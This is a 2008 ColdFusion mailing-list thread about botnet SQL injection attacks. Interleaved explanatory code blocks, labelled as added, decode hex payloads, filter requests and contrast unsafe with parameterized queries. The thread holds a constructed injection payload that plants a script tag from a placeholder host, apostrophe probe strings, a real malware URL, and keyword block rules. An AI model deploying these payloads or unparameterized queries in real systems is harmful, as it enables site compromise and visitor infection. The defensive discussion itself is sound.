08/10/2008 08:39 AM

Suggesting and getting caught doing are 2 different things. IF writing/posting code were an issue though... then everyone who posted the full script would be worried ;-) If anything in my hypothetical 'if' were an issue though... I'd drag you down with me for helping to spread it in your reply :-o Heh .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com ----- Excess quoted text cut - see Original Post for more -----

Author:
denstar
08/11/2008 05:30 PM

> Suggesting and getting caught doing are 2 different things. IF > writing/posting code were an issue though... then everyone who posted the > full script would be worried ;-) I hope it's just chicken-little, but it's happening to other countries, so... If we continue down the path we've sorta started, defending against this stuff (by spreading information, and/or using tools) will be just as illegal as actually perpetrating crimes. Just a little off-topic food for thought.  Fight for your right, pump up the volume, etc.. /end public service announcement -- email?  Hmmm... get me my aid!  -- Or better yet, just have the aid do it for me.

Author:
Jenny Gavin-Wear
08/21/2008 01:06 AM

I'm using WhosOn, an IIS server monitor.  It does an auto look up on the location of the IP and I can also set it up to record alerts for keywords, such as DECLARE. www.whoson.com ----- Excess quoted text cut - see Original Post for more -----

Author:
Wil Genovese
08/08/2008 05:11 PM

So far I have done a small non-representative sample of IPs and found them to be from all around the globe.  I have Asia Pacific Network, RIPE Network Amsterdam, Latin America and Caribbean (LACNIC), Hughes Network MD USA, Rogers Cable Toronto ON, and the list goes on and on.  So go ahead and just block THE WORLD. Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine is a tax for doing wrong. A tax is a fine for doing well. On Aug 8, 2008, at 3:25 PM, Brad Wood wrote: ----- Excess quoted text cut - see Original Post for more -----

Author:
Brad Wood
08/08/2008 07:01 PM

> on.  So go ahead and just block THE WORLD. > I don't plan on blocking anyone.  I just wanted to play with the data.  :) ~Brad

Author:
Andy Matthews
08/08/2008 04:18 PM

blocking the IPs would probably stop the attacks, but analyzing them is going to be useless. They're either using some hacked computer as a proxy, or have some sort of spoofing in place. Unless you're really good at forensics, you'll never find their real origination point. andy Tell us how you really feel Ben.  :) I had to temporarily stop apache on my site long enough to get a stop gap in place.  My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up.  SSH was even unresponsive. I think I'm going to dump all these attempts in a database to analyze.  I'm curious where the majority of the IPs are coming from.  There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Author:
Ian Skinner
08/08/2008 12:30 PM

Ben Forta wrote: > ... parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant > socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. > > --- Ben Now please don't hold back your feelings on our account.  Please just tell us how you really feel! P.S.  As Mark said.  This is a cool side of a CF celebrity we just don't get to see.  Cool!

Author:
Ben Forta
08/08/2008 12:37 PM

Darn, I blew my cover! ;-) --- Ben ----- Excess quoted text cut - see Original Post for more -----

Author:
Mike Kear
08/08/2008 01:17 PM

Ben Forta said ....> <<<<> On the plus side, it's nice to see CF finally getting the recognition it ----- Excess quoted text cut - see Original Post for more ----- What makes you think they're lawyers, Ben? Mike Kear Windsor, NSW, Australia CEO  AFP Webworks Pty Ltd http://afpwebworks.com

Author:
Mark Kruger
08/08/2008 02:00 PM

Mike, That's the funniest comment I've heard this week... 10 points for Mr. Kear. -mark Ben Forta said ....> <<<<> On the plus side, it's nice to see CF finally getting the recognition it > deserves, even if it is from parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form > repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. ----- Excess quoted text cut - see Original Post for more ----- What makes you think they're lawyers, Ben? Mike Kear Windsor, NSW, Australia CEO  AFP Webworks Pty Ltd http://afpwebworks.com

Author:
Andy Matthews
08/08/2008 02:22 PM

Hysterical!! ----- Excess quoted text cut - see Original Post for more -----

Author:
Eric P
08/08/2008 02:45 PM

We've also noticed these SQL injection attempts rear their head the last day or so; saw almost the exact same type of attack (i.e., same injection payload) back in April as well. The attack we're seeing is very (MS) SQL Server specific as they're trying to hit some SQL Server system tables and inject some HTML links in any fields that can hold text.   We put in place a simple filter at the tops of our pages to cfabort any requests that contain T-SQL cruft in the URL/FORM vars (i.e., DECLARE, EXEC(, CAST(, etc.). We're also noticing some URL var snooping going on that may or may not be related to the above attacks.  Basically an apostrophe is being tried at the end of known URL var combinations. For example, we'll see three successive errant query strings come through like this.

?a=1'&b=2&c=3
?a=1&b=2'&c=3
?a=1&b=2&c=3'

where they're trying the apostrophe at the end of each var, trying to escape a potential var being used as an SQL string in the back end. IP address bounces around too much, so it's tough to monitor/ban. Something like fail2ban (www.fail2ban.org) may be useful for those running Unix/Linux servers. Eric Pierce

Author:
Brad Wood
08/08/2008 02:56 PM

They might be doing a screen scrape looking for an error message to see if they've hit on a vulnerable parameter.  When/if they find one, they probably log it or attempt to attack it. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Author:
Terry Ford
08/08/2008 03:50 PM

Our site has now seen just over 200,000 attack attempts over the past 48 hours, 73,000 attack attempts over the past 5 hours. Not nearly a DOS concern yet, as the acceleration of attacks has started to at least flatten a bit over the last 2-3 hours, but we're watching it carefully. The attacks appear to only affect MSSQL.  MySQL seems to be safe from THIS attack, but clearly it's time to batten the hatches if you haven't already. We have 1.2 million pages indexed in Google, where the botnet is extracting URLs from.   The level of the attack you are witnessing is likely proportional to your presence in Google. The attacks are ONLY against our .CFM pages.   No attacks are being run against our obfuscated CFM pages (product.cfm?id=12 => /product/12.html). Here's the botnet attack that appears to be hitting us all: http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx Decoding the hex of our current attacks, most of them are pointing to http://sdo.1000mg.cn/csrss/w.js (malware).   That is the Asprox botnet, which has been going through ASP sites for a while...   looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF.   Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities. The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become. Here's the rewrite I'm using (linux apache) to keep traffic off the app server.

RewriteCond %{QUERY_STRING} .*DECLARE.*
RewriteRule ^(.*)$  violation.htm [nc,L]

Interesting philosophical thought:   I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14  appearing as /product/14.html etc etc) has helped reduce the attacks significantly.   It seems to me that such URL rewriting is actually a very important security tool as we enter a period where botnets start targeting .cfm pages.     I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks.   Seems to me that it's a lot safer presenting your entire site as HTML to the outside world. Regards Terry
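Two things in the posts above are worth having in code rather than prose: the hex-encoded T-SQL payload Terry describes (DECLARE @S, SET @S=CAST(0x... AS CHAR(4000)), EXEC(@S), with the real statement hidden in the hex literal), and the one-parameter-at-a-time apostrophe probing Eric describes. The following is an added example in Python, not code from the thread or from either of the rewrite rules or scripts mentioned in it. The sample query strings and request paths are constructed here for illustration; the hex is generated from a placeholder UPDATE statement pointing at a placeholder script URL (example.invalid), so the decoded text is an assumption about the payload's shape, not the actual attack string.

```python
"""Added example, not code from the thread: decode the hex-encoded T-SQL
payload Terry describes and spot the apostrophe probing Eric describes.
Every sample request below is constructed for illustration; the script URL
is a placeholder, not the one seen in the real attack."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The bot hides its SQL as a hex literal: DECLARE @S ...; SET @S=CAST(0x... AS CHAR(4000)); EXEC(@S)
HEX_CAST_RE = re.compile(
    r"CAST\(\s*0x([0-9a-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\b", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def decode_hex_payload(query_string):
    """Return (decoded_sql, injected_script_url); (None, None) if no hex CAST is present."""
    qs = unquote(query_string)  # bots send DECLARE%20...; one round of URL decoding
    m = HEX_CAST_RE.search(qs)
    if not m:
        return None, None
    hex_digits = m.group(1)
    if len(hex_digits) % 2:      # truncated by a log cutoff or proxy; nothing to decode
        return None, None
    raw = bytes.fromhex(hex_digits)
    # N-prefixed types (NCHAR/NVARCHAR) are UTF-16LE in SQL Server; CHAR/VARCHAR are single-byte
    encoding = "utf-16-le" if m.group(2).upper() == "N" else "latin-1"
    sql = raw.decode(encoding, errors="replace")
    src = SCRIPT_SRC_RE.search(sql)
    return sql, (src.group(1) if src else None)


def find_quote_probes(request_paths, min_params=2):
    """Return (path, parameter-names) groups in which a trailing apostrophe was
    tried on every parameter, one parameter per request, across the supplied requests."""
    probed = {}
    for path in request_paths:
        parts = urlsplit(path)
        params = parse_qsl(parts.query, keep_blank_values=True)
        names = tuple(name for name, _ in params)
        if len(names) < min_params:
            continue
        tainted = [name for name, value in params if value.endswith("'")]
        if len(tainted) != 1:  # a probe request touches exactly one parameter
            continue
        probed.setdefault((parts.path, names), set()).add(tainted[0])
    return sorted(key for key, hit in probed.items() if hit == set(key[1]))


# --- constructed samples (assumed payload shape, placeholder URL) --------------
SAMPLE_SQL = ("UPDATE [Products] SET [Description]=RTRIM(CONVERT(VARCHAR(4000),[Description]))"
              "+'<script src=http://example.invalid/w.js></script>'")
# Query strings as a bot would send them; the hex is generated here so it is exact
SAMPLE_QUERY = ("id=12;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                + SAMPLE_SQL.encode("latin-1").hex().upper()
                + "%20AS%20CHAR(4000));EXEC(@S);--")
SAMPLE_QUERY_N = ("id=12;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
                  + SAMPLE_SQL.encode("utf-16-le").hex().upper()
                  + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
SAMPLE_REQUESTS = [
    "/product.cfm?a=1'&b=2&c=3",
    "/product.cfm?a=1&b=2'&c=3",
    "/product.cfm?a=1&b=2&c=3'",
    "/search.cfm?q=O'Brien&page=1",   # a real apostrophe in data, not a sweep
    "/product.cfm?a=1&b=2&c=3",
]

if __name__ == "__main__":
    sql, url = decode_hex_payload(SAMPLE_QUERY)
    print("decoded:", sql)
    print("injects:", url)
    print("probed:", find_quote_probes(SAMPLE_REQUESTS))
```

The decoder tells you what the bot would have run and where the injected script lives, which is the information you need before deciding whether a database that did take the hit needs cleaning. The probe finder deliberately ignores a single apostrophe in real data (a name, a contraction) and only reports a parameter set on which every parameter was tried in turn.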

Author:
Michael Dinowitz
08/08/2008 03:58 PM

I'm using ionic isapi with the following

RewriteCond %{QUERY_STRING} ;DECLARE [I]
RewriteRule ;DECLARE /index.htm [I,L]

it works perfectly except for a single issue. If you're using a custom 404 in iis (like piping 404 errors to CF), then the isapi will hang the server. -- Michael Dinowitz (http://www.linkedin.com/in/mdinowitz) President: House of Fusion    (http://www.houseoffusion.com) Publisher: Fusion Authority    (http://www.fusionauthority.com) Adobe Community Expert / Advanced Certified ColdFusion Professional

Author:
Matt Williams
08/08/2008 07:04 PM

> Here's the rewrite I'm using (linux apache) to keep traffic off the app server. > > RewriteCond %{QUERY_STRING} .*DECLARE.* > RewriteRule ^(.*)$  violation.htm [nc,L] Okay, I'm a rewrite and apache newbie. I'm trying to replicate locally before doing this on my server. I'm running Win XP with Apache 2.2. In my httpd.conf file I removed the # sign from this line: LoadModule rewrite_module modules/mod_rewrite.so Then I added the above rewrite rules within one of my <VirtualHost> sites. Should that be all I have to do? Doesn't seem to work if I do myLocalSite/index.cfm?test=DECLARE Do the rewrite rules go somewhere else? Do I need something more than just the LoadModule line? Thanks, -- Matt Williams "It's the question that drives us."

Author:
Matt Williams
08/08/2008 07:09 PM

Scratch that. declare is case sensitive. Seems to work now. Matt ----- Excess quoted text cut - see Original Post for more -----

Author:
Pete Ruckelshaus
08/08/2008 10:54 PM

Has anyone written a broad-spectrum script (i.e. scrubs URL variables, form variables, looks for verboten words, etc.) that is effective against these attacks?  If not, why don't we get coordinated and write something as a community that users can simply include/invoke via application.cfm or in specific files...something that is not limited to a framework and something that would perhaps work with CF6/7/8.  I know there are people on this list who are MUCH more experienced than I am that would have a much more elegant solution than I could come up with.  Moreover, because virtually all of my sites are on shared hosts (Windows/IIS/CF8), I don't have the luxury of being able to do URL rewrites and that sort of thing. Thanks, Pete

Author:
Mark Kruger
08/09/2008 12:32 AM

Pete, Gabriel Reed and Mary Jo Sminkey created a decent regex and script that does a good job. http://www.coldfusionmuse.com/index.cfm/2008/7/28/Coldfusion-Blacklist-Function-for-SQLi It uses a native java regex pattern matcher for efficiency - meaning it will work only on cf 6.x or above. Mary Jo wrapped it up in an include file here: http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18 This file can be dropped into a cfapplication.cfm file (note: it must come AFTER the <cfapplication> tag or you will need to edit it to not use the application scope).

Also please note that using a black list function should be considered a first line of defence and not a solution. It has several weaknesses including:

1) It protects only against known threats. In order to be excluded we have to be a step far enough ahead to make sure the pattern is included.
2) It will produce false positives.
3) It is not role or user based.
4) Tends to give a false sense of security.

Validation, DB permissions and configurations, and binding (cfqp) are all important factors in protecting against injection. I have to say that I'm watching this unfold and a lot of effort is going into sticking our finger in the dike with blacklisting techniques instead of laying out roadmaps for improving code. Yes I know - some code has thousands of queries and it is boring (not to mention thankless) to laboriously insert cfqueryparam into query after query. But that is a major part of the "fix" - indeed a bigger part of the fix than any blacklisting technique we can devise together. Having said all of that, at this moment I completely understand the urgency to stop the attack by the shortest means possible. In fact, the frequency of these attacks is causing a denial of service effect for sites with a ton of .cfm pages indexed - so stopping the attack before it gets to the meat of your code is important. My blog, for example, got thousands of attacks overnight. All of them "reached" the database and failed - but that doesn't mean I'm just going to let them keep on hitting the DB.  I put in my blocker script to intercept the requests and abort them before they ever get to the DB. Recent efforts have gone further up the request chain and focused on ISAPI rewrite and Mod_rewrite (http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents-sql-injection) with the idea that these spurious requests should be intercepted and handled prior to reaching the Coldfusion server altogether. In this situation I am in favor of such efforts in spite of the general catch-all nature - at least until the frequency of such attacks dies down. -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com

Author:
Mary Jo Sminkey
08/09/2008 11:04 AM

>1) It protects only against known threats. In order to be excluded we have >to be a step far enough ahead to make sure the pattern is included. >2) It will produce false positives. >3)  It is not role or user based. >4) Tend to give a false sense of security. Just to add to this, in my own testing of the RegEx, I definitely was getting false positives, with just normal text strings (no other characters needed). So I do have some concerns about any long-term use of it, and would caution anyone using it to be aware that it may block more than you intend it to. In my own software, I've modified how it is called so it's only used on the front-end, open-to-the-world part of my software, as if someone gets through the back-end security checks, they certainly don't need to bother with a SQL injection to mess with the database! ;-) The goal here is just mainly to block the request as soon as the invalid strings in any vulnerable scope are detected, and that's essentially what it does, scanning the url, form, cookie and cgi scopes. --- Mary Jo
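Mark's weaknesses (1) and (2) and Mary Jo's false positives on plain text strings are easy to see side by side. The following is an added example in Python, not code from the thread and not the contents of either linked script; the two keyword lists and all sample strings are my own assumptions, chosen only to show the trade-off. A keyword-anywhere filter trips on ordinary English, a filter that requires a statement separator before the keyword (or a hex CAST) trips less often but still does, and neither notices a payload that uses no listed keyword at all.

```python
"""Added example, not code from the thread: why a keyword blacklist gives
false positives and still misses payloads it was not written for.
Keyword lists and sample strings are constructed, not taken from any script."""
import re

# Naive filter: any T-SQL keyword anywhere in the value trips it
NAIVE_RE = re.compile(r"declare|cast|exec|update|insert|delete|drop|select", re.IGNORECASE)

# Tighter filter: a keyword only counts after a statement separator or comment start,
# or as a CAST of a hex literal, which is the shape of the bot's payload
STRUCTURAL_RE = re.compile(
    r"(?:;|--|/\*)\s*(?:declare|exec(?:ute)?|set|update|insert|delete|drop|select)\b"
    r"|cast\(\s*0x[0-9a-f]+\s+as\b",
    re.IGNORECASE)


def naive_blacklist(value):
    return NAIVE_RE.search(value) is not None


def structural_blacklist(value):
    return STRUCTURAL_RE.search(value) is not None


def classify(values):
    """Map each value to (naive_hit, structural_hit) so the two filters can be compared."""
    return {v: (naive_blacklist(v), structural_blacklist(v)) for v in values}


# constructed samples: two attack shapes and three legitimate values
BOT_PAYLOAD = "12;DECLARE @S CHAR(4000);SET @S=CAST(0x5550444154 AS CHAR(4000));EXEC(@S);--"
HAND_CRAFTED = "12' OR 1=1--"                                   # tautology; no listed keyword
PLAIN_ENGLISH = "I declare this castle the broadcast winner"   # keywords as ordinary words
SEMICOLON_TEXT = "Menu; select your size"                      # trips even the tighter pattern
CONTRACTION = "we'll update you on delivery"

if __name__ == "__main__":
    samples = [BOT_PAYLOAD, HAND_CRAFTED, PLAIN_ENGLISH, SEMICOLON_TEXT, CONTRACTION]
    for value, (naive, structural) in classify(samples).items():
        print(f"naive={naive!s:5} structural={structural!s:5}  {value}")
```

The tautology string gets through both filters, which is Mark's point (1): the list knows this bot, not the next one. The semicolon sentence shows point (2) survives even the tighter pattern. Both filters are stop-gaps in front of the real fix in the thread, binding every parameter with cfqueryparam.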

Author:
David Lakein
08/12/2008 07:15 PM

----- Excess quoted text cut - see Original Post for more ----- I also had a concern about thread safety; it's caching the java.util.regex.Matcher object in Application scope, and calling Application.injChecker.reset(testvar) for each url/form/etc variable -- seems like Matcher.reset() changes state of the cached Matcher object? It might be safer to cache the Pattern, then get the rePattern.matcher('') on each request. Looks cool otherwise, though I might remove some of the keywords from the regex before using here. Thanks, - David

Author:
Mary Jo Sminkey
08/20/2008 02:41 PM

> I also had a concern about thread safety; it's caching the java.util. > regex.Matcher object in Application scope, and calling Application. > injChecker.reset(testvar) for each url/form/etc variable -- seems like > Matcher.reset() changes state of the cached Matcher object? Thanks for pointing this out...I updated the tool on my site to address this and also switched it to use a different RegEx that seems to work better and throw less false positives. Same link to download as before: http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18 --- Mary Jo

Author:
David Moore, Jr.
08/20/2008 04:33 PM

I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do. Does this thing just raise its ugly head every now and then and go away for a while? This is the first I have seen of it on my server. Thanks in advance, ~David G. Moore, Jr.    UpstateWeb, LLC ----- Excess quoted text cut - see Original Post for more -----

Author:
Mary Jo Sminkey
08/20/2008 04:51 PM

> I am currently using the SQLprev.cfm from Jochem to stop the onslaught
> of superfluous bandwidth suckage from my server, but was wondering
> what the difference would be with this one.

Since I am not familiar with his, I cannot say what the difference would be. I did include URL, form, cookie and common CGI variables into mine as well, so it's pretty comprehensive for both this attack and others that might start looking for other vulnerable areas. It uses Gabriel's method of leveraging the Java regex pattern matcher, which seems to give better performance and is less likely to hang on large strings than with CF. Luis Melo, who contributed the RegEx that I am now using, has his own SQLi blocker as well that includes a bunch of additional functions (such as keeping a list of blacklisted IP addresses in application memory) which some people may like as well. My goal was to just try and put something together that could easily be dropped in any application and do its thing with fairly minimal overhead.

> Does this thing just raise its ugly head every now and then and go
> away for a while? This is the first I have seen of it on my server.

This particular attack? It does seem to come and go. I have no doubt the hackers will look for other avenues to exploit once it seems that this one is no longer having much effect.

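As an added example for the thread-safety concern quoted in Mary Jo's earlier reply and the scopes she lists here (it is not the code of her tool or of Luis Melo's blocker): one compiled java.util.regex.Pattern is shared in Application scope, while each request builds its own Matcher. It assumes it runs from Application.cfm after cfapplication has set up the Application scope; the regex and the log file name are constructed for illustration, and, as the thread says, a filter like this is a stopgap while queries move to cfqueryparam.

```cfml
<!--- Added example, not the code of Mary Jo's tool or Luis Melo's blocker.
      Assumes Application.cfm after <cfapplication>. The regex and log file
      name are constructed for illustration. --->

<!--- Compile the Pattern once. java.util.regex.Pattern is immutable and safe
      to share; Matcher carries per-match state (reset() rewrites it), which is
      why a single Matcher in Application scope is unsafe under concurrent requests. --->
<cfif NOT StructKeyExists(application, "injPattern")>
    <cflock scope="application" type="exclusive" timeout="10">
        <cfif NOT StructKeyExists(application, "injPattern")>
            <cfset application.injPattern = CreateObject("java", "java.util.regex.Pattern").compile("(?i);\s*(declare|exec(ute)?|cast|drop|insert|update|delete)\b")>
        </cfif>
    </cflock>
</cfif>

<cffunction name="looksLikeInjection" returntype="boolean" output="false">
    <cfargument name="value" type="string" required="true">
    <!--- A fresh Matcher per call, held in a local variable, so concurrent
          requests never see each other's match state. --->
    <cfset var m = application.injPattern.matcher(arguments.value)>
    <cfreturn m.find()>
</cffunction>

<cffunction name="checkScope" returntype="void" output="false">
    <cfargument name="scopeName" type="string" required="true">
    <cfargument name="scopeData" type="struct" required="true">
    <cfset var key = "">
    <cfloop collection="#arguments.scopeData#" item="key">
        <cfif IsSimpleValue(arguments.scopeData[key])
              AND looksLikeInjection(arguments.scopeData[key])>
            <!--- Record which variable tripped the filter, then end the request
                  before any page code or query runs. --->
            <cflog file="sqli-filter" type="warning"
                   text="Blocked #arguments.scopeName#.#key# from #cgi.REMOTE_ADDR#">
            <cfheader statuscode="400" statustext="Bad Request">
            <cfabort>
        </cfif>
    </cfloop>
</cffunction>

<!--- The scopes Mary Jo lists: URL, form, cookie and a few common CGI values. --->
<cfset checkScope("url", url)>
<cfset checkScope("form", form)>
<cfset checkScope("cookie", cookie)>
<cfset checkScope("cgi", { HTTP_REFERER = cgi.HTTP_REFERER,
                           HTTP_USER_AGENT = cgi.HTTP_USER_AGENT,
                           QUERY_STRING = cgi.QUERY_STRING })>
```

`find()` matches anywhere in the value, so the check fires on a partial match; as Justin notes later in the thread, the cost is paid on every request, legitimate or not.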
Author:
Justin Scott
08/20/2008 05:05 PM

> I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do.

My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) just checks for basic SQL keywords with a semicolon in URL variables. It's a quick and dirty way to give you some protection from bots short-term while your code base is updated to use best practices and secure coding methods.

Mary Jo's is more thorough in that it checks additional variable scopes, and can help protect better against hand-drafted attacks, but may have a higher potential for false positives (though it's improved recently from what I can tell).

SQLPrev has a version compatible with CF5 for those who need it, where the other script relies on CFMX functions to run. I'm not saying one is better than the other; they both get the job done. Just use whatever works best for you, and update your code so that you don't need either of them <g>.

-Justin Scott

Author:
David Moore, Jr.
08/20/2008 05:19 PM

When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000s of lines of code I have developed over the last 'umpteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks?

Not trying to pick a fight, because I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>.

~David G. Moore, Jr.

Author:
Mary Jo Sminkey
08/20/2008 05:37 PM

> When you say "Update Your Code", are you saying using <cfqueryparam>?

Yes, that's what he is saying.

> so, go back and fix 1,000s of lines
> of code I have developed over the last 'umpteen' years or stop it
> before it starts?

Because if you don't, you are putting a LOT of faith in these blockers and assuming that hackers won't find other ways to attack a vulnerable application that doesn't get by them. Personally, I'm not sure I'd put *that* much trust in them, if I really cared about my sites being safe.

> Is this something new to CF8 or just a necessary
> evil because of SQL Injection Attacks?

Nothing new, and certainly not unique to ColdFusion either.

> is <cfqueryparam> something a lot of programmers
> really use?

Uh, yes.

> This is the first I have ever heard of using <cfqueryparam>.

That is a truly scary thought. I hope you will spend some time on the ColdFusion blogs, which have lots of information on the importance of using it.

--- Mary Jo

Author:
Ian Skinner
08/20/2008 05:39 PM

David Moore, Jr. wrote:
> Not trying to pick a fight, because I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>.

Yes, <cfqueryparam...> is well used, and for very good reasons. One of which is: what do you want to happen if the next clever hacker comes along with an attack that gets around all these solutions that have been developed to stop them at the gate? Do you really want to gamble your data and possibly your career on the fact that you can out-guess every hacker, who collectively have almost endless time and resources to figure out ways around these solutions?

I equate it to this analogy I have been dying to use for some time. Would you never build the city walls and gates just because you have sentries watching the road? No matter how good and undefeatable you think your sentries are.

Or why have database passwords if you have a firewall? (That one might be better.)

Author:
Josh Nathanson
08/20/2008 05:39 PM

> Not trying to pick a fight, because I am sure you have forgotten more code
----- Excess quoted text cut - see Original Post for more -----

It depends on what you mean by "a lot". But, if you'd been hanging out on this list at all, you'd have heard of cfqueryparam. It's discussed quite often. But, since most people learn ColdFusion on their own, and it's not a "necessary" tag to know about to get things done, you could go for years without using it or even understanding why it's needed.

-- Josh

Author:
David Moore, Jr.
08/20/2008 05:43 PM

And this is where I am. I have been using CF since 4.5. Very scary. Glad I have found this list. I am sure to learn a lot. I will try to read and not bother. Thanks for the SMACK DOWN. I will start to write it in and become more learned. I can say, just in the last weeks since joining I have learned a lot.

~David G. Moore, Jr.

Author:
Justin Scott
08/20/2008 05:45 PM

> When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000s of lines of code I have developed over the last 'umpteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks?

Essentially, yes, code should be using cfqueryparam and other secure coding methods to keep the baddies out. The resources will get used either way, really. You can either rely on a filter up-front and use up CPU cycles regardless of whether a user is legitimate or not, or even whether or not a query is being run in the page, etc. Or, you can implement cfqueryparam where appropriate and only use those cycles where they're needed, and you'll get the added benefit of prepared statements on the SQL Server in most cases, and the queries will run slightly faster as a result. Either way you go, protect yourself and your clients.

SQL injection attacks have been around since before I got started in web development, and secure coding against them has been a best practice just as long. I remember updating "old" CF code I inherited way back when I was using ColdFusion 4, so it's certainly nothing new.

It's unfortunate that you haven't seen this in practice until now, but it really is something you should be doing. It's been my observation over the years that web programmers in general (not just limited to ColdFusion) tend to learn about security only when there is a breach of some kind, and then have to scramble to learn under fire. Just as an example, how many out there run e-commerce applications and have never heard of PCI-DSS?

I'm not picking on you specifically, David, so please don't think I'm calling you out or anything. I'm always learning new things myself, but we web developers need to collectively get more educated about the risks and threats we face and alter our practice accordingly.

-Justin Scott

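The cfqueryparam form Justin describes, as an added example that is not his code or anyone else's from the thread: the unparameterized "before" shape beside the parameterized "after", plus the early rejection of a malformed value that David asked about. The datasource, table, column and form field names are constructed for illustration.

```cfml
<!--- Added example; not Justin's code or anything from the thread. The datasource,
      table, column and form field names are constructed for illustration. --->

<!--- BEFORE: the request value is pasted into the SQL text, so whatever the
      client sends in ?productID= is parsed by the database as part of the
      statement. Shown only for contrast with the queries below. --->
<cfquery name="qProductUnsafe" datasource="#application.dsn#">
    SELECT productID, name, price
    FROM   products
    WHERE  productID = #url.productID#
</cfquery>

<!--- AFTER, step 1: cut a bad value off early. IsValid rejects anything that is
      not an integer before any database work is done, so the request costs a
      check and a 400 instead of a query. --->
<cfif NOT IsValid("integer", url.productID)>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfabort>
</cfif>

<!--- AFTER, step 2: bind the value as a parameter. The driver sends the SQL text
      and the value separately (a prepared statement), so the value is never
      re-parsed as SQL; cfsqltype also type-checks it on the ColdFusion side, and
      the reusable statement plan is the speed gain Justin mentions. --->
<cfquery name="qProduct" datasource="#application.dsn#">
    SELECT productID, name, price
    FROM   products
    WHERE  productID = <cfqueryparam value="#url.productID#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- Strings get the same treatment. Wildcards for LIKE belong in the bound value,
      not in the SQL text, and maxlength caps how much the client can send. --->
<cfquery name="qSearch" datasource="#application.dsn#">
    SELECT productID, name
    FROM   products
    WHERE  name LIKE <cfqueryparam value="%#form.search#%"
                                   cfsqltype="cf_sql_varchar" maxlength="120">
</cfquery>
```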
Author:
David Moore, Jr.
08/20/2008 05:59 PM

Justin,

I certainly don't feel picked on. I feel blessed to have a place where I can learn from people who do know so much. And you are right. I (we) only seem to learn under fire. I am a one man business owner in a small town with limited resources and time. 10 hour days, work weekends, what is family time except coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So, what do we do?

I am a little embarrassed to say I didn't know, but at least in honesty I can learn and get a complete picture. So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????

Thanks everyone!

~David G. Moore, Jr.

P.S. Speaking of Smack Downs, Mary Jo's got a great right cross :) Go get 'em girl!

Author:
Justin Scott
08/20/2008 06:21 PM

> I certainly don't feel picked on. I feel blessed to have a place where I can learn from people who do know so much. And you are right. I (we) only seem to learn under fire. I am a one man business owner in a small town with limited resources and time. 10 hour days, work weekends, what is family time except coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So, what do we do?

Well, the first step is getting more connected to the community, being exposed to different styles, and being on a list such as this one is a great start. Presentations at user groups can also cover topics such as this if you have one near your area.

> So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????

In short, PCI-DSS is the Payment Card Industry Data Security Standard. It is required for any merchant who accepts, processes, handles, stores, or transmits credit card or debit card information. It isn't law, but your merchant account (or those of your clients) will have provisions in their contracts that require compliance with these rules. You can read more about it at:

https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml

That's another whole can o' worms though.

-Justin Scott

Author:
David Moore, Jr.
08/20/2008 06:31 PM

Consider me connected. At the same time, I will try not to just suck the life out of the list and provide substance where I can. I was a morning radio announcer for 20 years before becoming a web programmer, so if you can't remember the name of that song or artist - just ask. :)

As for the can o' worms: if you're ever in Spartanburg, SC, just bring 'em along and I can show you some really nice fishin'!

